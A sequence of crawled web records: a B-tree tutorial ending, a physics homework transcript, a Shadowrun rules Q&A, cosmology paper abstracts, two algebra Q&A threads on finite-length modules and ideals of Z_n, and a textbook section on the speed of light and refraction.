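            if key > node.keys[i]:
                i += 1
        self._insert_nonfull(node.children[i], key)

t = BTree(d=2)
for k in [8, 3, 1, 9, 5, 2, 7, 6, 4]:
    t.insert(k)
print(all(t.search(k) for k in range(1, 10)), t.search(42))  # True False
```

Because a full node is split before the recursion descends into it, insertion never needs to walk back up the tree, and all leaves stay at the same depth.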
Finally, we come to deletion, which always seems to be the hardest operation. We begin by finding the key in the tree. If the key is in an internal node, we can delete it in the same way that you would delete from a binary search tree. Consider the two children separated by that key; choose either the smallest key in the right child or the largest key in the left child as the new separator value and delete that key from the leaf. So now we have reduced deletion to just deleting from leaves. If the leaf has $d$ or more keys, we simply remove it and return. Otherwise, we need to consider rebalancing the tree to maintain the property that all nodes have between $d-1$ and $2d-1$ keys. To rebalance, look at the immediate left and right siblings of the node which has too few keys (if they exist). If one of them has $d$ or more keys, then move the closest key from the sibling to the current node and update both nodes and the parent's separator value (it is somewhat of a "rotation"). Otherwise, take one of the immediate siblings, which must have $d-1$ elements, combine it with the current node, and move the separator value from the parent to the new combined node. If the parent now has too few keys, we repeat the process. If we reach the root and it has only two children which are subsequently combined, the height of the tree decreases. Again, this leaves all of the leaves at the same depth.
So that is a basic implementation of a B-tree, and there are certainly many optimizations that can be made to reduce the number of times you have to retrieve nodes. But the last important discussion is why B-trees are better than binary search trees for databases. And the reason is because B-trees are designed to leverage the performance properties of spinning disks. Disks have very high seek latency due to the time it takes for the mechanical arm to move to the correct location, but they have relatively good throughput once the arm is in place (see here for more details). As such, disk-backed data structures benefit more from reading a block of data at once rather than a very small amount. In the case of B-trees, the size of the nodes are often chosen to be exactly the size of a disk block to maximize performance; as such, the data structure has much smaller depth than a binary search tree, resulting in many fewer disk seeks and significantly better performance. | 2018-11-14 03:23:23 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.6188887357711792, "perplexity": 321.49657514851566}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": 
"s3://commoncrawl/crawl-data/CC-MAIN-2018-47/segments/1542039741578.24/warc/CC-MAIN-20181114020650-20181114042650-00134.warc.gz"} |
https://www.doubtnut.com/question-answer-physics/radiations-given-out-from-a-source-when-subjected-to-an-electric-field-in-a-direction-perpendicular--644314145 | Home
>
English
>
Class 10
>
Physics
>
Chapter
>
Self Assessment Paper -5
>
Radiations given out from a so...
Updated On: 27-06-2022
Text Solution
Solution : gamma ray
Transcript
hello friends, in this question radiation given out from a source is subjected to an electric field in a direction perpendicular to its path, as shown in the diagram, where the arrows mark the paths of radiations A, B and C. we have to answer the following in terms of A, B and C: name the radiation which is unaffected by the electric field. the radiations coming out would be either alpha, beta or gamma. we know that an alpha particle carries a charge of plus two, a beta particle carries a charge of minus one, and a gamma ray carries zero charge. since a gamma ray doesn't carry any charge, it is undeflected and unaffected by the electric field that is applied. thank you
| 2022-08-15 16:28:01 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.2802797853946686, "perplexity": 1931.9177110453033}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": false}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-33/segments/1659882572192.79/warc/CC-MAIN-20220815145459-20220815175459-00465.warc.gz"}
https://rpg.stackexchange.com/questions/134427/are-there-shooting-modifiers-for-large-targets | # Are there shooting modifiers for Large targets?
A player made a Troll, Giant subtype, so he is 3.5 meters (11 feet, 3 inches) in height, and I am wondering: are there rules that make him any easier to hit than, say, a 1.2 m dwarf?
If not, it seems a bit unfair to me toward smaller targets. Yet, I just started to GM Shadowrun, so I could be overlooking something.
Assuming you're interested in 5th edition:
Run & Gun contains an optional rule (RG2, p. 108), but it's based on CON + STR, so dwarfs are usually easier to hit than humans. The following modifiers apply to the attack roll based on the sum:
| CON + STR | Modifier |
|-----------|----------|
| 2 to 4    | -1       |
| 5 to 10   | 0        |
| 11 to 15  | +1       |
| 16+       | +2       |
There are smaller (-2 and -3) and larger (+3) modifiers, but those don't apply to metahuman sized targets.
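For reference, the metahuman-range rows of that table can be encoded as a small function (a sketch of the optional rule only; the larger and smaller modifiers for non-metahuman sizes are left out):

```python
def size_modifier(con_plus_str: int) -> int:
    """Attack-roll modifier from the optional Run & Gun size rule,
    metahuman range only (CON + STR from 2 up)."""
    if con_plus_str <= 4:
        return -1
    if con_plus_str <= 10:
        return 0
    if con_plus_str <= 15:
        return +1
    return +2

# A typical dwarf (CON + STR around 4) is slightly harder to hit,
# while a troll or giant (11+) is easier.
```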
As for fairness:
Trolls have a maximum INT that is reduced by 1. Also, the cost of building a troll is extraordinarily high. Giants also have a reduced REA maximum.
But why is using the same modifier unfair? You knew the benefits and drawbacks of building a dwarf/troll when creating the character, and size doesn't seem to be considered an advantage or drawback when determining the cost of a metatype (except for higher lifestyle cost).
• The giant is an awakened, so CON and STR are not his strong stats. He's a flabby giant. Penalties for having such a creature aside, I thought it would be unfair since he can literally become anti-tank cover for the rest of his team when he dies and falls down. He is enormous, hence I was wondering whether there were any modifiers. Thank you for your answer. – Story Killinger Oct 27 '18 at 8:17
• @StoryKillinger uhm... Giant is a troll metatype, they are generally around the 3.5 meter mark with 11+ on CON+STR. To frame it simply: Giants are metahumans, not creatures – Trish Oct 27 '18 at 14:19
https://www.cosmostat.org/tag/euclid | ## Hybrid Pℓ(k): general, unified, non-linear matter power spectrum in redshift space
Authors: Journal: Journal of Cosmology and Astroparticle Physics, Issue 09, article id. 001 (2020) Year: 09/2020 Download: Inspire | arXiv | DOI
## Abstract
Constraints on gravity and cosmology will greatly benefit from performing joint clustering and weak lensing analyses on large-scale structure data sets. Utilising non-linear information coming from small physical scales can greatly enhance these constraints. At the heart of these analyses is the matter power spectrum. Here we employ a simple method, dubbed "Hybrid Pl(k)", based on the Gaussian Streaming Model (GSM), to calculate the quasi non-linear redshift space matter power spectrum multipoles. This employs a fully non-linear and theoretically general prescription for the matter power spectrum. We test this approach against comoving Lagrangian acceleration simulation measurements performed in GR, DGP and f(R) gravity and find that our method performs comparably to or better than the TNS redshift space power spectrum model for dark matter. When comparing the redshift space multipoles for halos, we find that the Gaussian approximation of the GSM with a linear bias and a free stochastic term, N, is competitive with the TNS model. Our approach offers many avenues for improvement in accuracy as well as further unification under the halo model.
## Abstract
In metric theories of gravity with photon number conservation, the luminosity and angular diameter distances are related via the Etherington relation, also known as the distance-duality relation (DDR). A violation of this relation would rule out the standard cosmological paradigm and point at the presence of new physics. We quantify the ability of Euclid, in combination with contemporary surveys, to improve the current constraints on deviations from the DDR in the redshift range 0<z<1.6. We start by an analysis of the latest available data, improving previously reported constraints by a factor of 2.5. We then present a detailed analysis of simulated Euclid and external data products, using both standard parametric methods (relying on phenomenological descriptions of possible DDR violations) and a machine learning reconstruction using Genetic Algorithms. We find that for parametric methods Euclid can (in combination with external probes) improve current constraints by approximately a factor of six, while for non-parametric methods Euclid can improve current constraints by a factor of three. Our results highlight the importance of surveys like Euclid in accurately testing the pillars of the current cosmological paradigm and constraining physics beyond the standard cosmological model.
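The distance-duality relation being tested can be illustrated numerically. In any metric theory with photon number conservation, $d_L = (1+z)^2 d_A$, so the ratio $\eta(z) = d_L/[(1+z)^2 d_A]$ equals 1. The sketch below builds both distances from a comoving distance integral in a flat ΛCDM toy model (the parameter values are illustrative, not from the paper):

```python
from math import sqrt

C_KMS = 2.99792458e5  # speed of light, km/s

def comoving_distance(z, om=0.3, h0=70.0, steps=10000):
    """Trapezoid-rule integral of c dz'/H(z') for flat LCDM, in Mpc."""
    integrand = lambda zp: C_KMS / (h0 * sqrt(om * (1 + zp)**3 + (1 - om)))
    dz = z / steps
    return sum(0.5 * (integrand(i * dz) + integrand((i + 1) * dz)) * dz
               for i in range(steps))

z = 1.0
d_c = comoving_distance(z)
d_A = d_c / (1 + z)             # angular diameter distance
d_L = d_c * (1 + z)             # luminosity distance
eta = d_L / ((1 + z)**2 * d_A)  # distance-duality ratio
```

A measured η deviating from 1 would signal a DDR violation; by construction, this FLRW model gives η = 1 identically.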
## Precision calculations of the cosmic shear power spectrum projection
Authors: M. Kilbinger, C. Heymans, M. Asgari et al. Journal: MNRAS Year: 2017 Download: ADS | arXiv
## Abstract
We compute the spherical-sky weak-lensing power spectrum of the shear and convergence. We discuss various approximations, such as flat-sky, and first- and second-order Limber equations for the projection. We find that the impact of adopting these approximations is negligible when constraining cosmological parameters from current weak lensing surveys. This is demonstrated using data from the Canada-France-Hawaii Lensing Survey (CFHTLenS). We find that the reported tension with Planck Cosmic Microwave Background (CMB) temperature anisotropy results cannot be alleviated, in contrast to the recent claim made by Kitching et al. (2016, version 1). For future large-scale surveys with unprecedented precision, we show that the spherical second-order Limber approximation will provide sufficient accuracy. In this case, the cosmic-shear power spectrum is shown to be in agreement with the full projection at the sub-percent level for l > 3, with the corresponding errors an order of magnitude below cosmic variance for all l. When computing the two-point shear correlation function, we show that the flat-sky fast Hankel transformation results in errors below two percent compared to the full spherical transformation. In the spirit of reproducible research, our numerical implementation of all approximations and the full projection are publicly available within the package nicaea at http://www.cosmostat.org/software/nicaea.
## Summary
We discuss various methods to calculate projections for weak gravitational lensing: since light from lensed galaxies picks up matter inhomogeneities of the cosmic web along the line of sight as the photons propagate through the Universe to the observer, these inhomogeneities have to be projected onto a 2D observable, the cumulative shear or convergence. The full projection involves three-dimensional integrals over highly oscillating Bessel functions, and can be time-consuming to compute numerically to high accuracy. Most previous work has therefore used approximations such as the Limber approximation, which reduce the integrals to 1D, thereby neglecting modes along the line of sight.
The authors show that these projections are more than adequate for present surveys. Sub-percent accuracy is reached for l>20, for example as shown by the pink curve, which is the ratio of the case 'ExtL1Hyb' to the full projection. The abbreviation means 'extended', corresponding to the improved approximation introduced by LoVerde & Afshordi (2008), first-order Limber, and hybrid, since this is a hybrid between flat-sky and spherical coordinates. This case has been used in most of the recent publications (e.g. for KiDS), whereas the case 'L1Fl' (first-order Limber flat-sky) was popular for most publications since 2014.
These approximations are sufficient for the small areas of current observations coming from CFHTLenS, KiDS, and DES, and their errors are well below the cosmic variance of even future surveys (the figure shows Euclid, 15,000 deg², and KiDS, 1,500 deg²).
The paper then discusses the second-order Limber approximation, introduced in a general framework by LoVerde & Afshordi (2008), and applied to weak lensing in the current paper. The best 2nd-order case 'ExtL2Sph' reaches sub-percent accuracy down to l=3, sufficient for all future surveys.
The paper also computes the shear correlation function in real space, and shows that those approximations have a very minor influence.
We then go on to re-compute the cosmological constraints obtained in Kilbinger et al. (2013), and find virtually no change when choosing different approximations. Only the deprecated case 'ExtL1Fl' makes a noticeable difference, which is however still well within the statistical error bars. This case shows a particularly slow convergence to the full projection.
Similar results have been derived in two other recent publications, Kitching et al. (2017), and Lemos, Challinor & Efstathiou (2017).
Note however that Kitching et al. (2017) conclude that errors from projection approximations of the types we discussed here (Limber, flat sky) could make up to 11% of the error budget of future surveys. This is however assuming the worst-case scenario including the deprecated case 'ExtL1Fl', and we do not share their conclusion, but think that for example the projection 'ExtL2Sph' is sufficient for future surveys such as LSST and Euclid.
## Abstract
We present new constraints on the relationship between galaxies and their host dark matter halos, measured from the location of the peak of the stellar-to-halo mass ratio (SHMR), up to the most massive galaxy clusters at redshift $z\sim0.8$ and over a volume of nearly 0.1 Gpc$^3$. We use a unique combination of deep observations in the CFHTLenS/VIPERS field from the near-UV to the near-IR, supplemented by $\sim60\,000$ secure spectroscopic redshifts, analysing galaxy clustering, galaxy-galaxy lensing and the stellar mass function. We interpret our measurements within the halo occupation distribution (HOD) framework, separating the contributions from central and satellite galaxies. We find that the SHMR for the central galaxies peaks at $M_{\rm h, peak} = 1.9^{+0.2}_{-0.1}\times10^{12} M_{\odot}$ with an amplitude of $0.025$, which decreases to $\sim0.001$ for massive halos ($M_{\rm h} > 10^{14} M_{\odot}$). Compared to central galaxies only, the total SHMR (including satellites) is boosted by a factor of 10 in the high-mass regime (cluster-size halos), a result consistent with cluster analyses from the literature based on fully independent methods. After properly accounting for differences in modelling, we have compared our results with a large number of results from the literature up to $z=1$: we find good general agreement, independently of the method used, within the typical stellar-mass systematic errors at low to intermediate mass (${M}_{\star} < 10^{11} M_{\odot}$) and the statistical errors above. We have also compared our SHMR results to semi-analytic simulations and found that the SHMR is tilted compared to our measurements in such a way that they over- (under-) predict star formation efficiency in central (satellite) galaxies.
## Abstract
Weak-lensing peak counts have been shown to be a powerful tool for cosmology. They provide non-Gaussian information about large-scale structure, complementary to second-order statistics. We propose a new flexible method to predict weak lensing peak counts, which can be adapted to realistic scenarios, such as a real source distribution, intrinsic galaxy alignment, mask effects, photo-z errors from surveys, etc. The new model is also suitable for applying the tomography technique and non-linear filters. A probabilistic approach to model peak counts is presented. First, we sample halos from a mass function. Second, we assign them NFW profiles. Third, we place those halos randomly on the field of view. The creation of these "fast simulations" requires much less computing time compared to N-body runs. Then, we perform ray-tracing through these fast simulation boxes and select peaks from weak-lensing maps to predict peak number counts. The computation is achieved by our Camelus algorithm, which we make available at this http URL. We compare our results to N-body simulations to validate our model. We find that our approach is in good agreement with full N-body runs. We show that the lensing signal dominates shape noise and Poisson noise for peaks with SNR between 4 and 6. Also, counts from the same SNR range are sensitive to Ωm and σ8. We show how our model can discriminate between various combinations of those two parameters. In summary, we offer a powerful tool to study weak lensing peaks. The potential of our forward model is its high flexibility, making the use of peak counts under realistic survey conditions feasible.
## Summary
A new, probabilistic model for weak-lensing peak counts is being proposed in this first paper of a series of three. The model is based on drawing halos from the mass function and, via ray-tracing, generating weak-lensing maps to count peaks. These simulated maps can directly be compared to observations, making this a forward-modelling approach of the cluster mass function, in contrast to many other traditional methods using cluster probes such as X-ray, optical richness, or SZ observations.
The model prediction is in very good agreement with N-body simulations.
It is very flexible, and can potentially include astrophysical and observational effects, such as intrinsic alignment, halo triaxiality, masking, photo-z errors, etc. Moreover, the pdf of the number of peaks can be output by the model, allowing for a very general likelihood calculation, without e.g. assuming a Gaussian distribution of the observables.
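The three-step recipe above (sample halos from a mass function, assign profiles, place them randomly) can be caricatured in a few lines. Everything here — the power-law stand-in for the mass function, the mass limits, the field size — is an illustrative assumption, not the actual Camelus implementation:

```python
import random

def sample_halos(n_halos, m_min=1e12, m_max=1e15, alpha=-1.9, field_deg=5.0):
    """Toy 'fast simulation': draw halo masses from a power law dn/dM ~ M^alpha
    by inverse-transform sampling, and scatter them uniformly on the field."""
    a1 = alpha + 1.0
    halos = []
    for _ in range(n_halos):
        u = random.random()
        mass = (m_min**a1 + u * (m_max**a1 - m_min**a1)) ** (1.0 / a1)
        x, y = random.uniform(0, field_deg), random.uniform(0, field_deg)
        halos.append((mass, x, y))
    return halos

# The real model would now attach an NFW profile to each halo and
# ray-trace through the box to produce a convergence map and its peaks.
```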
## CFHTLenS tomographic weak lensing: Quantifying accurate redshift distributions
Authors: J. Benjamin, L. Van Waerbeke, C. Heymans, M. Kilbinger, et al. Journal: MNRAS Year: 2013 Download: ADS | arXiv
## Abstract
The Canada-France-Hawaii Telescope Lensing Survey (CFHTLenS) comprises deep multi-colour (u*g'r'i'z') photometry spanning 154 square degrees, with accurate photometric redshifts and shape measurements. We demonstrate that the redshift probability distribution function summed over galaxies provides an accurate representation of the galaxy redshift distribution accounting for random and catastrophic errors for galaxies with best fitting photometric redshifts z_p < 1.3.
We present cosmological constraints using tomographic weak gravitational lensing by large-scale structure. We use two broad redshift bins 0.5 < z_p <= 0.85 and 0.85 < z_p <= 1.3 free of intrinsic alignment contamination, and measure the shear correlation function on angular scales in the range ~1-40 arcmin. We show that the problematic redshift scaling of the shear signal, found in previous CFHTLS data analyses, does not afflict the CFHTLenS data. For a flat Lambda-CDM model and a fixed matter density Omega_m=0.27, we find the normalisation of the matter power spectrum sigma_8=0.771 \pm 0.041. When combined with cosmic microwave background data (WMAP7), baryon acoustic oscillation data (BOSS), and a prior on the Hubble constant from the HST distance ladder, we find that CFHTLenS improves the precision of the fully marginalised parameter estimates by an average factor of 1.5-2. Combining our results with the above cosmological probes, we find Omega_m=0.2762 \pm 0.0074 and sigma_8=0.802 \pm 0.013.
## CFHTLenS tomographic weak lensing cosmological parameter constraints: Mitigating the impact of intrinsic galaxy alignments
Authors: C. Heymans, E. Grocutt, A. Heavens, M. Kilbinger, et al. Journal: MNRAS Year: 2013 Download: ADS | arXiv
## Abstract
We present a finely-binned tomographic weak lensing analysis of the Canada-France-Hawaii Telescope Lensing Survey, CFHTLenS, mitigating contamination to the signal from the presence of intrinsic galaxy alignments via the simultaneous fit of a cosmological model and an intrinsic alignment model. CFHTLenS spans 154 square degrees in five optical bands, with accurate shear and photometric redshifts for a galaxy sample with a median redshift of zm =0.70. We estimate the 21 sets of cosmic shear correlation functions associated with six redshift bins, each spanning the angular range of 1.5<theta<35 arcmin. We combine this CFHTLenS data with auxiliary cosmological probes: the cosmic microwave background with data from WMAP7, baryon acoustic oscillations with data from BOSS, and a prior on the Hubble constant from the HST distance ladder. This leads to constraints on the normalisation of the matter power spectrum sigma_8 = 0.799 +/- 0.015 and the matter density parameter Omega_m = 0.271 +/- 0.010 for a flat Lambda CDM cosmology. For a flat wCDM cosmology we constrain the dark energy equation of state parameter w = -1.02 +/- 0.09. We also provide constraints for curved Lambda CDM and wCDM cosmologies. We find the intrinsic alignment contamination to be galaxy-type dependent with a significant intrinsic alignment signal found for early-type galaxies, in contrast to the late-type galaxy sample for which the intrinsic alignment signal is found to be consistent with zero. 
http://math.stackexchange.com/questions/570883/a-noetherian-module-annihilated-by-a-power-of-maximal-ideal-must-has-finite-leng | # A Noetherian module annihilated by a power of a maximal ideal must have finite length.
Let $M$ be a Noetherian $R$-module with $P^kM=0$ for some maximal ideal $P$ of $R$ and some integer $k$. How to show that $M$ has finite length?
The length of a module is defined to be the maximum length of a chain of submodules: $$0=M_0<M_1<\cdots<M_{n-1}<M_n=M$$
I have tried the following. We can assume there is no submodule strictly between $M_i$ and $M_{i+1}$, and try to prove that such $n$ is bounded.
Then we have $$M_{i+1}/M_i\cong R/Q_i$$
where $Q_i=\operatorname{ann}_R(M_{i+1}/M_i)$ is maximal.
Then I cannot move on. I tried to look at the localization of the chain at $P$, but it seems to provide nothing.
Could anyone help?
## 2 Answers
WLOG, choose $k$ to be the smallest possible. Consider the sequence of submodules
$$(*)\qquad0=MP^{k} \subsetneq MP^{k-1} \subsetneq \dots \subsetneq MP \subsetneq M \,.$$
The goal is to show that every consecutive factor of this sequence is of finite length.
For arbitrary $l \in \{0,1, \dots, k-1\},$ consider the factor $MP^l/MP^{l+1}$. Since $M$ is noetherian, this clearly is a finitely generated module. The annihilator $\mathrm{Ann}_R(MP^l/MP^{l+1})$ clearly contains the maximal ideal $P$. On the other hand, from the strictness of the inclusion $MP^{l+1} \subsetneq MP^{l}$ it follows that $1 \notin \mathrm{Ann}_R(MP^l/MP^{l+1})$, hence (since $P$ is maximal) $\mathrm{Ann}_R(MP^l/MP^{l+1})=P,$ a maximal ideal.
Now, since any module $N$ can be considered as an $R/\mathrm{Ann}_R(N)$-module (with the multiplication defined by $n \cdot (r+\mathrm{Ann}_R(N)):=nr$ and the important property that the lattice of submodules does not change under this shift of perspective), we can see that $MP^l/MP^{l+1}$ is actually a finitely generated $R/P$-module, i.e. a vector space of finite dimension. Hence, it is of finite length.
Adding more details:
It is a well-known fact that a module $M$ is of finite length iff it has a finite composition series, i.e. a finite chain of submodules from $0$ to $M$ with the consecutive factors simple. Now, we have shown (for arbitrary $l$) that $MP^l/MP^{l+1}$ is of finite length, hence there exists a composition series $$0=MP^{l+1}/MP^{l+1}=N_0^{l} \subseteq N_{1}^{l} \subseteq \dots \subseteq N_{k_l}^{l}=MP^{l}/MP^{l+1}$$ with simple consecutive factors. After applying the correspondence theorem, we obtain a chain of submodules of $M$ $$MP^{l+1}=\overline{N_0^{l}}\subseteq \overline{N_1^{l}} \subseteq \dots \subseteq \overline{N_{k_l}^{l}}=MP^{l}$$ again with simple consecutive factors. Doing this for every $l$, we obtain a refinement of the series $(*)$ with simple consecutive factors, i.e. a finite composition series of $M$, so $M$ has finite length.
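The chain $(*)$ can be made concrete for $R = \mathbb{Z}$, $M = \mathbb{Z}/p^k$ and $P = (p)$. A short script (illustrative only, not part of the answer) lists the sizes of the submodules $MP^l$ and confirms that each consecutive factor is $\mathbb{Z}/p$, so the length of $M$ is $k$:

```python
def submodule(g, n):
    """The submodule g*(Z/nZ) of Z/nZ, as a set of residues mod n."""
    return {(g * k) % n for k in range(n)}

def chain_sizes(p, k):
    """Sizes of the chain M = Z/p^k > pM > p^2 M > ... > p^k M = 0."""
    n = p ** k
    return [len(submodule(p ** l, n)) for l in range(k + 1)]

# For p = 2, k = 3 the sizes are 8, 4, 2, 1 -- each factor has order 2,
# i.e. is the simple module Z/2, so Z/8 has length 3.
```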
Sorry but I think you only proved this specific chain has finite length. What about other chains? Isn't the length of a module the maximal length of all possible chains? – hxhxhx88 Nov 17 '13 at 21:54
Jordan - Hölder. – Martin Brandenburg Nov 17 '13 at 22:00
@hxhxhx88 Sorry, I thought this was clear. It uses the fact that module is of finite length if and only if it has a finite composition series. I will add a comment about it into the answer. – PavelC Nov 17 '13 at 22:16
$P^kM=0$ implies $P^k\subset \mathrm{Ann}_R(M)$. This shows that $R/\mathrm{Ann}_R(M)$ is an artinian ring (its only prime ideal being $P/\mathrm{Ann}_R(M)$), so $M$ is an artinian $R/\mathrm{Ann}_R(M)$-module, that is, an artinian $R$-module. Being both noetherian and artinian, $M$ has finite length, and we are done.
Sorry, your approach is too advanced. My commutative algebra course hasn't covered Artinian rings yet. If it is possible, could you expand it a little bit? – hxhxhx88 Nov 17 '13 at 21:56
https://math.stackexchange.com/questions/2569986/describe-all-prime-and-maximal-ideals-of-mathbbz-n | # Describe all prime and maximal ideals of $\mathbb{Z}_n$
I know that an ideal $P$ in $\mathbb{Z}_n$ is prime if and only if $\mathbb{Z}_n/P$ is an integral domain, and an ideal $m$ in $\mathbb{Z}_n$ is maximal if and only if $\mathbb{Z}_n/m$ is a field. I think I've figured out that the ideals $p\mathbb{Z}_n$, where $p$ is a prime that divides $n$, make up the maximal ideals.
I have no idea how to figure out which are prime. Help?
Hint: Write $n=\prod_{i=1}^{r}p_i^{n_i}$ where the $p_i$ are distinct prime numbers. The prime and maximal ideals of $\mathbb{Z}_n$ are exactly those generated by the classes of the $p_i$. The Chinese remainder theorem implies that $\mathbb{Z}_n\simeq \mathbb{Z}/p_1^{n_1}\times\cdots\times \mathbb{Z}/p_r^{n_r}$ and $\mathbb{Z}_n/(p_i)\simeq\mathbb{Z}/p_i$, which is a field.
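A brute-force check of this (an illustrative sketch; $n = 12$ is chosen arbitrarily): for each prime $p$ dividing $n$, the ideal $p\mathbb{Z}_n$ has index $p$, so the quotient is the field $\mathbb{Z}/p$:

```python
def prime_divisors(n):
    """Distinct primes dividing n, by trial division."""
    ps, d = [], 2
    while d * d <= n:
        if n % d == 0:
            ps.append(d)
            while n % d == 0:
                n //= d
        d += 1
    if n > 1:
        ps.append(n)
    return ps

def ideal(g, n):
    """The ideal generated by g in Z/nZ, as a set of residues."""
    return {(g * k) % n for k in range(n)}

n = 12
quotient_sizes = {p: n // len(ideal(p, n)) for p in prime_divisors(n)}
# Each quotient Z_12/(p) has prime order p, hence is a field, so
# (2) and (3) are exactly the maximal (= prime) ideals of Z_12.
```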
• so what are the prime ideals? I don't really follow this – John Smith Dec 17 '17 at 2:31
• the prime and maximal are the same – Tsemo Aristide Dec 17 '17 at 2:33
https://phys.libretexts.org/TextMaps/General_Physics_Textmaps/Map%3A_College_Physics_(OpenStax)/25%3A_Geometric_Optics/25.4%3A_The_Law_of_Refraction | # 25.4: The Law of Refraction
It is easy to notice some odd things when looking into a fish tank. For example, you may see the same fish appearing to be in two different places. (See Figure 1.) This is because light coming from the fish to us changes direction when it leaves the tank, and in this case, it can travel two different paths to get to our eyes. The changing of a light ray’s direction (loosely called bending) when it passes through variations in matter is called refraction. Refraction is responsible for a tremendous range of optical phenomena, from the action of lenses to voice transmission through optical fibers.
REFRACTION
The changing of a light ray’s direction (loosely called bending) when it passes through variations in matter is called refraction.
SPEED OF LIGHT
The speed of light $$c$$ not only affects refraction, it is one of the central concepts of Einstein’s theory of relativity. As the accuracy of the measurements of the speed of light were improved, $$c$$ was found not to depend on the velocity of the source or the observer. However, the speed of light does vary in a precise manner with the material it traverses. These facts have far-reaching implications, as we will see in "Special Relativity." It makes connections between space and time and alters our expectations that all observers measure the same time for the same event, for example. The speed of light is so important that its value in a vacuum is one of the most fundamental constants in nature as well as being one of the four fundamental SI units.
Figure 25.4.1. Looking at the fish tank as shown, we can see the same fish in two different locations, because light changes directions when it passes from water to air. In this case, the light can reach the observer by two different paths, and so the fish seems to be in two different places. This bending of light is called refraction and is responsible for many optical phenomena.
Why does light change direction when passing from one material (medium) to another? It is because light changes speed when going from one material to another. So before we study the law of refraction, it is useful to discuss the speed of light and how it varies in different media.
# The Speed of Light
Early attempts to measure the speed of light, such as those made by Galileo, determined that light moved extremely fast, perhaps instantaneously. The first real evidence that light traveled at a finite speed came from the Danish astronomer Ole Roemer in the late 17th century. Roemer had noted that the average orbital period of one of Jupiter’s moons, as measured from Earth, varied depending on whether Earth was moving toward or away from Jupiter. He correctly concluded that the apparent change in period was due to the change in distance between Earth and Jupiter and the time it took light to travel this distance. From his 1676 data, a value of the speed of light was calculated to be $$2.26 \times 10^{8} m/s$$ (only 25% different from today’s accepted value). In more recent times, physicists have measured the speed of light in numerous ways and with increasing accuracy. One particularly direct method, used in 1887 by the American physicist Albert Michelson (1852–1931), is illustrated in Figure 2. Light reflected from a rotating set of mirrors was reflected from a stationary mirror 35 km away and returned to the rotating mirrors. The time for the light to travel can be determined by how fast the mirrors must rotate for the light to be returned to the observer’s eye.
Figure 25.4.2. A schematic of early apparatus used by Michelson and others to determine the speed of light. As the mirrors rotate, the reflected ray is only briefly directed at the stationary mirror. The returning ray will be reflected into the observer's eye only if the next mirror has rotated into the correct position just as the ray returns. By measuring the correct rotation rate, the time for the round trip can be measured and the speed of light calculated. Michelson’s calculated value of the speed of light was only 0.04% different from the value used today.
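The geometry of this measurement fixes the required rotation rate. Assuming (hypothetically) an eight-sided rotating mirror, the next face must rotate into place — one-eighth of a turn — during the round trip to the stationary mirror 35 km away. The numbers below are a back-of-the-envelope sketch, not Michelson's actual setup parameters:

```python
C = 3.00e8        # speed of light, m/s
D_ONE_WAY = 35e3  # distance to the stationary mirror, m
FACES = 8         # assumed number of faces on the rotating mirror

round_trip_time = 2 * D_ONE_WAY / C            # ~2.3e-4 s
revs_per_second = (1 / FACES) / round_trip_time
rpm = revs_per_second * 60
```

With these assumed numbers the mirror must spin at about 536 revolutions per second (roughly 32,000 rpm); inverting the logic, the measured rotation rate yields the speed of light.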
The speed of light is now known to great precision. In fact, the speed of light in a vacuum $$c$$ is so important that it is accepted as one of the basic physical quantities and has the fixed value $c = 2.99792458 \times 10^{8} \approx 3.00 \times 10^{8} m/s,$ where the approximate value of $$3.00 \times 10^{8} m/s$$ is used whenever three-digit accuracy is sufficient. The speed of light through matter is less than it is in a vacuum, because light interacts with atoms in a material. The speed of light depends strongly on the type of material, since its interaction with different atoms, crystal lattices, and other substructures varies. We define the index of refraction $$n$$ of a material to be $n = \frac{c}{v}, \tag{25.4.1}$ where $$v$$ is the observed speed of light in the material. Since the speed of light is always less than $$c$$ in matter and equals $$c$$ only in a vacuum, the index of refraction is always greater than or equal to one.
VALUE OF THE SPEED OF LIGHT:
$c = 2.99792458 \times 10^{8} \approx 3.00 \times 10^{8} m/s$
INDEX OF REFRACTION:
$n = \frac{c}{v}, \tag{25.4.1}$
That is, $$n \ge 1$$. The table gives the indices of refraction for some representative substances. The values are listed for a particular wavelength of light, because they vary slightly with wavelength. (This can have important effects, such as colors produced by a prism.) Note that for gases, $$n$$ is close to 1.0. This seems reasonable, since atoms in gases are widely separated and light travels at $$c$$ in the vacuum between atoms. It is common to take $$n = 1$$ for gases unless great precision is needed. Although the speed of light $$v$$ in a medium varies considerably from its value $$c$$ in a vacuum, it is still a large speed.
Table: Index of Refraction in Selected Media ($$\lambda = 589\, \mathrm{nm}$$)

| Medium | $$n$$ |
| --- | --- |
| Vacuum | 1.00000 |
| Air (STP) | 1.000293 |
| Water | 1.333 |
| Zircon | 1.923 |
| Diamond | 2.419 |
Example 25.4.1: Speed of Light in Matter
Calculate the speed of light in zircon, a material used in jewelry to imitate diamond.
